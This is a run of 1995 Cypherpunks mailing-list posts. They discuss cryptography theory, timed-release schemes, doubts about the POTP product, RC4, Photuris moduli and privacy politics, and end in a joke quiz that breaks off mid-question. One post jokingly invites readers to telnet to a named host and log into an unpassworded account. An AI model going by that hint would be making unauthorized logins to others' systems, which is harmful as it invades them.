Regards, Bryce signatures follow "To strive, to seek, to find and not to yield." bryce at colorado.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 -----END PGP SIGNATURE----- From ahupp at primenet.com Mon Nov 13 12:42:06 1995 From: ahupp at primenet.com (Adam Hupp) Date: Tue, 14 Nov 1995 04:42:06 +0800 Subject: Register Message-ID: <199511120442.VAA08265@usr2.primenet.com> >From: viking at pacifier.com (Robert East) >Date: Wed, 08 Mar 1995 22:46:45 -0800 >Subject: Register > >Register > >I'd like to sign up for email > >Bob I'd like to sign up for a clue Thanks! :) _____________________________________________________________ "We work in the dark We do what we can We give what we have Our doubt is our passion And our passion is our task The rest is the madness of art." --Henry James ___________________________________________________________ From bdavis at thepoint.net Mon Nov 13 12:47:25 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 14 Nov 1995 04:47:25 +0800 Subject: ACLU Cyber-Liberties Update: Nov. 8, 1995 In-Reply-To: <199511111547.HAA08706@blob.best.net> Message-ID: On Fri, 10 Nov 1995, James A. Donald wrote: > At 05:15 PM 11/8/95 -0500, ACLUNATL at aol.com wrote: > > According to the government's own statistics, 1,800 innocent conversations > > are intercepted each and every time a wiretap or other form of electronic > > surveillance is placed. > > This seems curiously inefficient, even for government work. Not at all. When a wiretap goes up, agents listen to every call that goes to or from the phone. If the call doesn't relate to anything "criminal," they must "minimize" the interception by not listening. 
They can listen again after some minutes to see if the topic has changed. The pre-wiretap minimization conference for agents is taken very seriously by ethical prosecutors (not an oxymoron for those who ask). Good agents (ditto) also take the briefing seriously. EBD From bdavis at thepoint.net Mon Nov 13 12:52:58 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 14 Nov 1995 04:52:58 +0800 Subject: Timed-release crypto - Proactive security plug In-Reply-To: Message-ID: On Mon, 13 Nov 1995, Timothy C. May wrote: > At 7:03 PM 11/13/95, Amir Herzberg wrote: > ... > >> --Tim May > >> > >> Views here are not the views of my Internet Service Provider or Government. > > > >How do you know that? :-) > > In the past, I have actually gotten warning letters from some of my > Internet Service Providers saying that my views were inimical to their own > views. One provider, who shall remain nameless, actually *turned off* my > access to NetNews until I agreed to post a clarification that the views I > was expressing were not his views! > And, being personally familiar on the Government's position on many of the issues discussed here, I can certify that many/most/all of Tim's views are not the views of the United States government! EBD > --Tim May > > Views here are not the views of my Internet Service Provider or Government. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From tcmay at got.net Mon Nov 13 13:07:15 1995 From: tcmay at got.net (Timothy C. 
May) Date: Tue, 14 Nov 1995 05:07:15 +0800 Subject: "Not the views of my government" Message-ID: At 8:16 PM 11/13/95, Brian Davis wrote: >And, being personally familiar on the Government's position on many of >the issues discussed here, I can certify that many/most/all of Tim's >views are not the views of the United States government! Indeed. Though many would argue that some (large) fraction of the views I and others express are right in line with the views of the Founders. Certainly Jefferson, Franklin, Henry, and others would be aghast at the modern interpretations of the Constitution. "What do you mean my inn may not allow smoking? Surely it is up to customers to freely choose to enter my inn or not enter my inn." "What do you mean I must hire fixed quotas of various ethnic and racial groups, no matter my preferences?" "How can the government command me to pay more for a worker than I wish to freely pay?" "Why are these things you call helicopters flying over my farm at all hours? if they are looking for "illegal crops," why is this their concern? Why do they subsidize tobacco production? Why is government paying farmers to grow some crops and not to grow other crops?" "What, pray tell, is this "key escrow" business? Do we no longer have protections against unlawful search? Are our papers and conversations now to be "escrowed" with the King's men? What country have I been brought back into?" "I am just an ignorant Founder; I know not the ways of your strange land." --Timothy Jefferson May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. 
"National borders are just speed bumps on the information superhighway." From weidai at eskimo.com Mon Nov 13 13:26:24 1995 From: weidai at eskimo.com (Wei Dai) Date: Tue, 14 Nov 1995 05:26:24 +0800 Subject: Diffie-Hellman in GF(2^n)? In-Reply-To: Message-ID: I wrote earlier: > Thanks for the reference. The paper gives a running time of exp(c(n > log n)^(1/2)) for discrete log in GF(p) and exp(c*n^(1/3)*(log n)^(2/3)) > for discrete log in GF(2^n). However, this paper was published in 1985. > There is now an algorithm to calculate discrete logs in GF(p) in > exp(c*n^(1/3)*(log n)^(2/3)) (see prime.discrete.logs.ps.Z in the same > directory), so perhaps GF(2^n) isn't so bad after all. To clarify my earlier post, although both of the latter two algorithms have a runtime of the form exp(c*n^(1/3)*(log n)^(2/3)), for GF(p) c=1.922+o(1), for GF(2^n) c=1.405+o(1). This seems to imply that if GF(2^n) is to be used, n needs to be 2.56*log p to achieve a comparable level of security to using GF(p). (2.56=1.922^3/1.405^3) Wei Dai From abacard at well.com Mon Nov 13 13:28:24 1995 From: abacard at well.com (Andre Bacard) Date: Tue, 14 Nov 1995 05:28:24 +0800 Subject: URL Version for ALPHA.C2.ORG FAQ Message-ID: <199511111848.KAA22368@well.com> Hello Remailer Users, Due to popular demand, I've created a URL version of my ALPHA.C2.ORG Remailer FAQ. Please link to this address: http://www.well.com/user/abacard/alpha.html See you in the future, Andre Bacard ====================================================================== abacard at well.com Bacard wrote "The Computer Privacy Stanford, California Handbook" [Intro by Mitchell Kapor]. http://www.well.com/user/abacard Published by Peachpit Press, (800) Enjoy your privacy... 283-9444, ISBN # 1-56609-171-3. ======================================================================= From beavis at bioanalytical.com Mon Nov 13 13:31:38 1995 From: beavis at bioanalytical.com (Beavis B. 
Thoopit) Date: Tue, 14 Nov 1995 05:31:38 +0800 Subject: Timed-release crypto - Proactive security plug In-Reply-To: <9511131904.AA21605@gimili.watson.ibm.com> Message-ID: <199511132053.PAA01851@bioanalytical.com> [...] > A solution to this is proactive secret sharing, as described in [HJKY95]. > In this protocol, the secret shares are periodically refreshed (i.e. new > shares are computed distributively and then the old shares are erased). > In this manner, an attacker has to break into most servers during the same > period; shares from one period are worthless on the next period. > > Best, Amir > > [HJKY95] `Proactive Secret Sharing', A. Herzberg, H. Krawczyk, S. Jareski, > M. Yung, Crypto 95. [...] Here is an example of _dynamics_ being used to increase the security of a logical protocol. I believe that dynamics may be usable at a more micro level to build a physical device that is expensive to compromise... From nobody at REPLAY.COM Mon Nov 13 13:33:18 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 14 Nov 1995 05:33:18 +0800 Subject: POTP Security Message-ID: <199511111919.UAA08790@utopia.hacktic.nl> We ordered POTP based on the initial blurbs by Kahn and others. It took a while to get it, we talked to Elementrix HQ and got voicemail, stutters and recordings saying be patient. We read c'punks' slash and burns in the waiting period. When the boxes appeared, we read the extra-thin documents -- mostly PR gush -- reflected, decided to leave the red white and blue boxes At No Time Padded. Later a POTP distributer's rep called to ask how we like the product. We said, haven't tried it, because we learned a bit from reading cryptography lists. We wondered if he knew what was being said. He said, yes, we know, but they're all wrong, it's a fabulous product, totally secure. How you gonna prove it, we asked, to consumers like us who don't know who to believe? 
You know, we're reading more these days about hacks of cryptography and we want to know more than press releases. The people you're citing for endorsement aren't cryptographers. Yes, he said, that's what we're hearing, that's why I'm calling you, we're looking for users to endorse the program while we're waiting for patent approvals, and trying to get the crypto authorities to sign NDA's. Sorry, we said, we can't take a chance on your product. Call us back after you get the crypto fuck-authorities to hack at it in public. From wilcoxb at nagina.cs.colorado.edu Mon Nov 13 13:33:21 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce) Date: Tue, 14 Nov 1995 05:33:21 +0800 Subject: Who needs time vaults anyway? In-Reply-To: <199511110843.AAA18344@infinity.c2.org> Message-ID: <199511111953.MAA26503@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Bryce wrote: > > Can anyone explain what use this theoretical "time-sensitive" crypto > box would be good for? Sameer wrote: > > Suppose you die. Hey! Who do you think you are? :-) Just kidding. When I woke up this morning I realized what I was missing: the decryption might be out of your hands, such as when you die, or you might *want* it to be out of your hands for some other reason. With that in mind, I can think of only one unalterable lower-limit on the time of a decryption-- the speed of light. Suppose you encrypt your data with successive layers of keys, K1-Kn. Then you encrypt each key with its predecessor, encrypting Kn with Kn-1, encrypting Kn-1 with Kn-2, etc. Destroy all copies of unencrypted keys except for K1, which has not been encrypted. Now put all odd-numbered keys in location A and all even-numbered keys in location B, which is 1 light minute from location A. Once an agent has received Key 1, it will take at least n minutes to decrypt the data. 
Of course, the agent could just take copies of all of the keys from location B on some physical media and transport the media to location A, which would make the lower bound on time to be "much longer than 1 minute". Hm. Suppose the n different keys are in n different physical locations, and the agent does not know where the k+1 location is until he decrypts the material at the k location. The "scavenger hunt" scheme for timed decryption. Of course this doesn't mean that you have to bury your crypto box and make a map with an "X" marking the spot. Each key could be held by a crypto box which is publically accessible on the Net. The important thing is that the decrypting agent can't retrieve the k+1 piece until he has decrypted the k piece. Then the lower bound on time of decryption is... um... Well it depends on the location of the decrypting agent with respect to the locations of the n pieces. (Neglecting, still, transmission overhead and decryption time.) I'm not sure what the lower bound actually is, but it can be increased simply by adding more pieces to the puzzle. A single station could serve up multiple pieces. It would only reveal the k piece if the querying agent can prove that he has the k-1 piece. Of course if the total number of stations is small then the "physically move the pieces" trick might work. Bryce signatures follow "To strive, to seek, to find and not to yield." 
bryce at colorado.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01 -----END PGP SIGNATURE----- From liberty at gate.net Mon Nov 13 13:36:40 1995 From: liberty at gate.net (Jim Ray) Date: Tue, 14 Nov 1995 05:36:40 +0800 Subject: unsuscribe all news groups [NOISE] Message-ID: <199511132103.QAA30498@tequesta.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Someone wrote: > >I wish to unsuscribe to all news groups as I feel I should be on a different >planet. The planet of the clues. JMR -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Freedom isn't Freeh -----END PGP SIGNATURE----- Regards, Jim Ray "...the politicians have been arguing over whether to increase the budget enormously or just hugely. The news media refer to this process as 'cutting' the budget." -- Dave Barry Visit my "Pretty Good Homepage" at http://shopmiami.com/prs/jimray/ ----------------------------------------------------------------------- PGP key Fingerprint 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 Key id. # E9BD6D35 (key on page & servers) IANAL ----------------------------------------------------------------------- Help Phil! 
email zldf at clark.net or http://www.netresponse.com/zldf _______________________________________________________________________ From karn at qualcomm.com Mon Nov 13 13:48:20 1995 From: karn at qualcomm.com (Phil Karn) Date: Tue, 14 Nov 1995 05:48:20 +0800 Subject: Photuris Primality verification needed In-Reply-To: <199511081704.JAA07274@qualcomm.com> Message-ID: <199511090337.TAA04357@servo.qualcomm.com> >I don't know. Maybe the right thing to do is require conforming >implementations to support a large modulus but include recommended >smaller moduli. Then Alice can always force Bob to use the large >modulus but, if both agree, they can use something smaller from the >standard or even their own home-grown modulus. Thanks. That's pretty much what we are doing -- requiring a particular 1024-bit modulus but recommending several others as options. There's a 2048 bit optional modulus and may even be a 4096-bit option if I can find one in reasonable time. There was going to be a 512-bit optional modulus but the group has reacted so strongly to it that I'm willing to withdraw it. Phil From jsw at netscape.com Mon Nov 13 13:57:26 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 14 Nov 1995 05:57:26 +0800 Subject: POTP Security In-Reply-To: <30A78DA4@mailer2> Message-ID: <30A7B5A1.59C7@netscape.com> Paul Koning 1695 wrote: > > > From: Paul Jackman > >Newgroups: talk.politics.crypto > > Subject: Re: Elementrix One-Time Pad > >.. > > The algorithm will be published when patent protection is assured. > > It is currently patent pending in several countries. > > I saw that comment earlier. It's rather a curious statement, given that the > rule of publication vs. patents is that publication before FILING kills > your ability to get the patent (in most countries) whereas publication > after filing but before grant is not an issue at all. 
This explains why > you often see a mad scramble in companies when something > patentable is about to be announced at a trade show, or explained > in a white paper... the filing has to be in the mail before that happens. > But only just before... whether the patent office takes days or years > to grant the patent doesn't matter. I would guess that they are choosing to be cautious so that if their patent is rejected they can still maintain it as a trade secret. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From turner at TeleCheck.com Mon Nov 13 14:12:04 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Tue, 14 Nov 1995 06:12:04 +0800 Subject: Tenticle: Yvette and unsuscribe all news groups In-Reply-To: <9511131928.AA21826@alpha> Message-ID: <9511132140.AA22158@mercury.telecheck.com> > > Mary Rose wrote: > > > I wish to unsuscribe ... > > > > Please send a one line message ... > > > Hmm... I was going to suggest asking Yvette. > Hmm.. the tenticle has been sending my death threats; this tenticle has a difficult time spelling "killed" correctly. Instructions for creating your own tenticle: telnet to vabeach.email.net and try to log into the unpassworded account 'mm'. This was obviously a BBS to increase the sysops chances for landing a human date. Hmmmm... From jcobb at ahcbsd1.ovnet.com Mon Nov 13 14:12:28 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Tue, 14 Nov 1995 06:12:28 +0800 Subject: New World Encryption In-Reply-To: Message-ID: Friend, Someone writes: We are already becoming a kind of "automatic cc:" for a variety of announcements, spams, and other earthshattering items. Someone may wish to include among these the document "Welcome to the cypherpunks mailing list!" 
If so, then before he discards it, here are some excerpts from that document: ...cypherpunks deals with technical details but slants the discussion toward their social implications. ...the debates on this list are about how to best get crypto out there. Cypherpunks do not seek to prevent other people from speaking about their experiences or their opinions. Cypherpunks hope that all people desiring privacy will learn how best to defend it. Cordially, Jim From jcobb at ahcbsd1.ovnet.com Mon Nov 13 14:16:40 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Tue, 14 Nov 1995 06:16:40 +0800 Subject: POTP Security In-Reply-To: Message-ID: Friend, On 11 10 95 jgrubs at left.webcasters.com inquired about POTP security: What level of security does this cute, little puppy provide??? One approach to answering that inquiry is an excerpt from: Date: Sat, 21 OCT 95 10:58:51 -0500 From: Paul Jackman Newgroups: talk.politics.crypto Subject: Re: Elementrix One-Time Pad ...mine [Jackman's background and experience] goes back to 1961 as Crypto Communications Control Command Center Supervisor for the National Security Agency (NSA), and US Army Intelligence Security. Even so, I do not consider myself expert in either the technical sense or the historical sense. But, I know enough not to comment on algorithms that I don't have access to. The algorithm will be published when patent protection is assured. It is currently patent pending in several countries. As far as marketing goes, this product is not going to disappear. We have been premarketing security technology for four years through beta, and one year in pilot with international Fortune 100 companies. The initial presentations on Internet about a year ago showed us that the newness and complexity of the Algorithm had to be presented one on one to the experts which Elementrix has done. 
There is a long parade of companies that have implemented this technology but do not wish to be named, (Typical of any security implementation.) Those who do acknowledge the integrity of the products are noteworthy, Allen Brill Kroll Assoc., Al Decker Coopers & Lybrand, Todd Sun Mergent, and there will be many more. Paul Jackman I silently corrected capitalization and spelling in the above excerpt. I do not understand the import of the expression "expert in either the technical sense or the historical sense." Cordially, Jim From jlasser at rwd.goucher.edu Mon Nov 13 14:47:52 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Tue, 14 Nov 1995 06:47:52 +0800 Subject: Hakim Bey mention of gvm't crypto policy Message-ID: This is a very brief excerpt from a Hakim Bey piece available at http://www.t0.or.at/hakimbey/boundary.htm, dealing with... well... lots of stuff, actually. Including stuff talked about on the list. I recommend the entire piece highly. Jon -------------------------------------------- Knowledge itself can be seen as a kind of virus. On the psychological level this perception manifested recently as a panic about "computer viruses", and more generally about computer hacking -- boundary violations in cyberspace, so to speak. The government wants access to all computer cypher-codes in order to control the "Net", the InterNet, which might otherwise spread everywhere, transmitting secrets, even secrets about "abuse" and kiddy porn -- as if the Net were a disease, rather than simply a free exchange of information. America's immune system can't take "too much knowing" (or whatever T.S. Eliot's lame-ass phrase was); America must be "protected" from penetration by foreign chaos cabals of evil hackers (who might look just like you and me) -- borders must be imposed. 
---------------------------------------------- ------------------------------------------------------------------------------ Jon Lasser (410)494-3072 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From nobody at REPLAY.COM Mon Nov 13 15:19:47 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 14 Nov 1995 07:19:47 +0800 Subject: what's going on Message-ID: <199511130745.IAA15877@utopia.hacktic.nl> Privacy is necessary for an open society in the electronic age. Privacy is not secrecy. A private matter is something one doesn't want the whole world to know, but a secret matter is something one doesn't want anybody to know. Privacy is the power to selectively reveal oneself to the world. If two parties have some sort of dealings, then each has a memory of their interaction. Each party can speak about their own memory of this; how could anyone prevent it? One could pass laws against it, but the freedom of speech, even more than privacy, is fundamental to an open society; we seek not to restrict any speech at all. If many parties speak together in the same forum, each can speak to all the others and aggregate together knowledge about individuals and other parties. The power of electronic communications has enabled such group speech, and it will not go away merely because we might want it to. Since we desire privacy, we must ensure that each party to a transaction have knowledge only of that which is directly necessary for that transaction. Since any information can be spoken of, we must ensure that we reveal as little as possible. In most cases personal identity is not salient. When I purchase a magazine at a store and hand cash to the clerk, there is no need to know who I am. 
When I ask my electronic mail provider to send and receive messages, my provider need not know to whom I am speaking or what I am saying or what others are saying to me; my provider only need know how to get the message there and how much I owe them in fees. When my identity is revealed by the underlying mechanism of the transaction, I have no privacy. I cannot here selectively reveal myself; I must _always_ reveal myself. Therefore, privacy in an open society requires anonymous transaction systems. Until now, cash has been the primary such system. An anonymous transaction system is not a secret transaction system. An anonymous system empowers individuals to reveal their identity when desired and only when desired; this is the essence of privacy. Privacy in an open society also requires cryptography. If I say something, I want it heard only by those for whom I intend it. If the content of my speech is available to the world, I have no privacy. To encrypt is to indicate the desire for privacy, and to encrypt with weak cryptography is to indicate not too much desire for privacy. Furthermore, to reveal one's identity with assurance when the default is anonymity requires the cryptographic signature. We cannot expect governments, corporations, or other large, faceless organizations to grant us privacy out of their beneficence. It is to their advantage to speak of us, and we should expect that they will speak. To try to prevent their speech is to fight against the realities of information. Information does not just want to be free, it longs to be free. Information expands to fill the available storage space. Information is Rumor's younger, stronger cousin; Information is fleeter of foot, has more eyes, knows more, and understands less than Rumor. We must defend our own privacy if we expect to have any. We must come together and create systems which allow anonymous transactions to take place. 
People have been defending their own privacy for centuries with whispers, darkness, envelopes, closed doors, secret handshakes, and couriers. The technologies of the past did not allow for strong privacy, but electronic technologies do. We the Cypherpunks are dedicated to building anonymous systems. We are defending our privacy with cryptography, with anonymous mail forwarding systems, with digital signatures, and with electronic money. Cypherpunks write code. We know that someone has to write software to defend privacy, and since we can't get privacy unless we all do, we're going to write it. We publish our code so that our fellow Cypherpunks may practice and play with it. Our code is free for all to use, worldwide. We don't much care if you don't approve of the software we write. We know that software can't be destroyed and that a widely dispersed system can't be shut down. Cypherpunks deplore regulations on cryptography, for encryption is fundamentally a private act. The act of encryption, in fact, removes information from the public realm. Even laws against cryptography reach only so far as a nation's border and the arm of its violence. Cryptography will ineluctably spread over the whole globe, and with it the anonymous transactions systems that it makes possible. For privacy to be widespread it must be part of a social contract. People must come and together deploy these systems for the common good. Privacy only extends so far as the cooperation of one's fellows in society. We the Cypherpunks seek your questions and your concerns and hope we may engage you so that we do not deceive ourselves. We will not, however, be moved out of our course because some may disagree with our goals. The Cypherpunks are actively engaged in making the networks safer for privacy. Let us proceed together apace. Onward. 
From nelson at santafe.edu Mon Nov 13 15:23:56 1995
From: nelson at santafe.edu (Nelson Minar)
Date: Tue, 14 Nov 1995 07:23:56 +0800
Subject: [NOISE] Credit Card security in the New York Times
Message-ID: <9511132213.AA19022@sfi.santafe.edu>

Today's New York Times has a nice article in the business section about credit card security on the Internet. It's more of an editorial than an article, but it's an editorial with the (IMNSHO) right spin: shipping a credit card number over the Internet, even unencrypted, is no less secure than giving it out over the phone.

The NYT has been doing a nice job covering computer issues in the past few months, in the Monday's business section. Worth reading if you want to keep an eye on intelligent media coverage of the net.

--
__ nelson at santafe.edu
\/ http://www.santafe.edu/~nelson/
PGP key 9D719FAD Fingerprint 3B 9B 8E 58 1C 90 57 3E B7 99 ED 13 65 2E 0B 24

From rjc at clark.net Mon Nov 13 15:56:16 1995
From: rjc at clark.net (Ray Cromwell)
Date: Tue, 14 Nov 1995 07:56:16 +0800
Subject: DejaNews all over again
In-Reply-To: <199511112036.MAA24650@jobe.shell.portal.com>
Message-ID: <199511112259.RAA20991@clark.net>

>
> On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions
> Expert", from Netscape Communications:
> > Please show us some proof. All you have done is post unfounded
> >allegations backed up by flawed logic and a misunderstanding of the
> >technology. Send me a URL, and I will point my navigator at it. If you
> >can collect my PGP key ring you can gloat here or anywhere else.
>
> I think "Jeff" ... Mr. unofficial not speaking for the company Netscape
> spokesperson, I think that you should rethink what you're suggesting.
> Your tactics won't serve your personal interests on this one. I really
> would recommend that you come clean. This is not about "gloating". I
> really take very little pleasure in this.

Jeff, I think it's in your best interest to not waste your time responding to this moron (who bears many features in common with Detweiler)

-Ray

From jsw at netscape.com Mon Nov 13 16:00:34 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Tue, 14 Nov 1995 08:00:34 +0800
Subject: Lotus Notes RSA Implementation Question
In-Reply-To: <9511102035.AA6927@moe.iris.com>
Message-ID: <30A52187.44EB@netscape.com>

Bob Glassley wrote:
> >>2) Considering RC4 is a proprietary scheme, have there been any
> >>concerted efforts to validate its strength or lack of? If so, could
> >>you give a pointer to any documents I could review.
> >>
> >There has been considerable discussion of the security of RC4 on this list, and
> >some subtle (i.e. worrisome but not disastrous) weaknesses have been
> >found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
> >to date because it does not encrypt recognizable plaintext with the first few
> >bytes of the RC4 stream.
>
> My understanding was that the problems exposed with RC4 that you
> mentioned, were with the particular implementation by Netscape. I
> guess I better go back to the archive and do some reading. :-)

Some RC4 keys that begin with specific values make it somewhat easier to guess the first few bytes of the encrypted data. This is a (probably minor) weakness of RC4, and is in no way specific to Netscape.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.

From jcobb at ahcbsd1.ovnet.com Mon Nov 13 16:04:19 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 14 Nov 1995 08:04:19 +0800
Subject: FBI Computer Chief
Message-ID:

Friend,

11 06 95 Computerworld 92 runs this "Briefs" item that may be of interest to you:

FBI names computer chief

Federal Bureau of Investigation Director Louis J. Freeh last week announced the appointment of Carolyn G.
Morris to head the FBI's Information Resource Division, which has 2,000 employees and a budget of $200 million. Morris will oversee all automation matters for the FBI and research and development for the new National Crime Information Center, a nationwide computerized system for law enforcement.

Cordially,

Jim

NOTE If you wish to subscribe to Computerworld, call 1 800 669 1002

From sameer at c2.org Mon Nov 13 16:04:22 1995
From: sameer at c2.org (sameer)
Date: Tue, 14 Nov 1995 08:04:22 +0800
Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion
Message-ID: <199511090615.WAA14726@infinity.c2.org>

Subject: REMINDER: PARTY! Nov. 18th, sponsored by Community ConneXion

Here's a little reminder: We're having a party in a little over a week. I hope you can make it.

Community ConneXion: the Internet Privacy Provider is having a party! We're partying to celebrate the spread of privacy on the net, through the increased security of internet products, as well as the growth of our services. (Many new services and new features on existing services will likely be announced before the party. Stay tuned.)

We're inviting all our customers and other potentially interested parties, which includes you, if you've received this note. So please join us, and send a copy of this invitation to anyone else you may know who would be interested in attending.

Where: Icon Byte Bar & Grill
       299 9th Street (at Folsom)
       SF CA 94103
When:  Sat. Nov. 18 1995 7:00 PM

This is a good chance to meet and network with the people who are making privacy on the internet a reality. Find out more about the HackNetscape and HackMicrosoft contests. Learn about our specialized web services, found nowhere else but at Community ConneXion. Hear about the anonymous and pseudonymous servers here and what we're doing to improve them.

There will be catered snacks and a no-host bar.

From perry at piermont.com Mon Nov 13 16:12:16 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:12:16 +0800
Subject: POTP Security
In-Reply-To:
Message-ID: <199511111827.NAA23896@jekyll.piermont.com>

jgrubs at left.webcasters.com writes:
> >The first commercially available implementation of our
> >POTP (Power One Time Pad) encryption algorithm. The package includes
> >a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt -
> >a stand alone file encryption program.
>
> What level of security does this cute, little puppy provide???

None whatsoever is my guess.

Perry

From klp at gold.tc.umn.edu Mon Nov 13 16:13:19 1995
From: klp at gold.tc.umn.edu (Kevin L Prigge)
Date: Tue, 14 Nov 1995 08:13:19 +0800
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110715.AAA21835@nagina.cs.colorado.edu>
Message-ID: <30a4ebe65774002@noc.cis.umn.edu>

According to rumor, Bryce said:
>
>
> -----BEGIN PGP SIGNED MESSAGE-----
>
> I don't really understand the use for "can't be opened until
> Christmas" tricks. If you don't want anyone to see your info until
> Christmas then just don't give them a copy until then! If you want
> to prove that you have it but not let them see it until later then
> do timestamping of hashes, zero-knowledge proofs and so forth.
>
>
> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?

An application that I've seen is financial data, more specifically MBS payment info. There is 100s of megabytes of data, and it was encrypted so that nobody could use the info before the release date/time, but the data needed to be transmitted prior to release because of bandwidth constraints. In this case, it wasn't real time-release, because the key was manually transmitted to release the information rather than implement some sort of "do not decrypt until" scheme.

--
Kevin L. Prigge         |"A computer lets you make more mistakes faster
UofM Central Computing  | than any invention in human history--with the
email: klp at cis.umn.edu | possible exceptions of handguns and tequila."
01001101100010110010111 |- Mitch Ratcliffe

From jamesd at echeque.com Mon Nov 13 16:17:24 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 14 Nov 1995 08:17:24 +0800
Subject: YOU_luz
Message-ID: <199511111824.KAA02105@blob.best.net>

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From perry at piermont.com Mon Nov 13 16:18:48 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:18:48 +0800
Subject: POTP Security
In-Reply-To:
Message-ID: <199511111833.NAA23915@jekyll.piermont.com>

> As far as marketing goes, this product is not going to disappear.
> We have been premarketing security technology for four years through
> beta, and one year in pilot with international Fortune 100 companies.

They would be smart not to give the names of their clients because good samaritans might inform them of the quality of their product.

Perry

From perry at piermont.com Mon Nov 13 16:19:53 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:19:53 +0800
Subject: Love Bugs
In-Reply-To: <199511110054.BAA15772@utopia.hacktic.nl>
Message-ID: <199511111814.NAA23863@jekyll.piermont.com>

Anonymous writes:
> The Nov 11 WSJ reports on the scare tactics of security
> consultants in the U.S. and by their co-conspiring
> counterparts -- spies -- abroad:

There is no November 11th WSJ -- the Wall Street Journal is only published Monday through Friday.

The topic you are covering isn't especially relevant, either.

.pm

From perry at piermont.com Mon Nov 13 16:21:32 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 14 Nov 1995 08:21:32 +0800
Subject: coding and nnet's
In-Reply-To: <199511102255.OAA10734@netcom16.netcom.com>
Message-ID: <199511111800.NAA23831@jekyll.piermont.com>

Bill Frantz writes:
> At 14:17 11/10/95 -0500, Atp3000 at aol.com wrote:
> >I just recently got interested in coding and cryptography, and I was
> >wondering if you could suggest 3 or 4 papers that address the application of
> >neural networks in cryptography.
>
> Perhaps neural nets could be used in an unknown plain text, brute force
> attack to automatically select possible decryptions for human examination.
> I don't know of any papers on the subject.

I remember seeing a good paper by our own David Wagner on how to do this without anything more than some ordinary statistics -- no complicated junk required. David, if you are reading this, could you comment?

Perry

From anon-remailer at utopia.hacktic.nl Mon Nov 13 16:57:48 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Tue, 14 Nov 1995 08:57:48 +0800
Subject: Cypherpunks Admissions Test
Message-ID: <199511132350.AAA01105@utopia.hacktic.nl>

Due to the large number of new subscribers, cryptogroupies, journalists, and conspiracy freaks currently posting to Cypherpunks, it has become necessary to restrict posting privileges on the list.

If you are contemplating a post to cypherpunks at toad.com, please take the following test FIRST to determine if your knowledge of cryptography and cypherpunk methodology is sufficient to allow your participation.

Simply pick the BEST answer to EACH question. Scoring information is provided at the end of the test.

1) The "Cyphernomicon" is:

   a) Tim May's >1mb rant on the social and technical possibilities of the general adoption of strong crypto.
   b) the cypherpunk FAQ.
   c) the 'bible' of H.P.Lovecraft's Cthulhu Mythos.
   d) an ancient codebook once used by Julius Caesar.

2) N.S.A stands for:

   a) restricting the spread of strong crypto so they can spy on us and keep their jobs.
   b) No Such Agency or Not Saying Anything, I forget which.
   c) the National Security Agency.
   d) aren't they running the space program or something?

3) If I wanted to keep my kid sister from reading my love letters, I'd:

   a) encrypt them all with 128 bit key IDEA, keep them in a hidden directory on an encrypted partition, keep a separate MD5 hash for each one, put a firewall between the disk and the rest of my system, and then ...
   b) use DES, cause it's already on my system.
   c) use ROT 26 (TWICE as good as ROT 13, right?).
   d) ite-wray em-thay in-ay ig-pay atin-lay.

4) A good source of random numbers is:

   a) radioactive decay interrupting a micro clock with a secure hash.
   b) random mouse movements.
   c) the system time, and the PID and PPID.
   d) the state lottery.

5) "Mod" stands for:

   a) modulo.
   b) "clock" arithmetic.
   c) a weird kind of math that cypherpunks use to keep newbies confused.
   d) New, hip, cool.

6) A "Certificate of Authority" is:

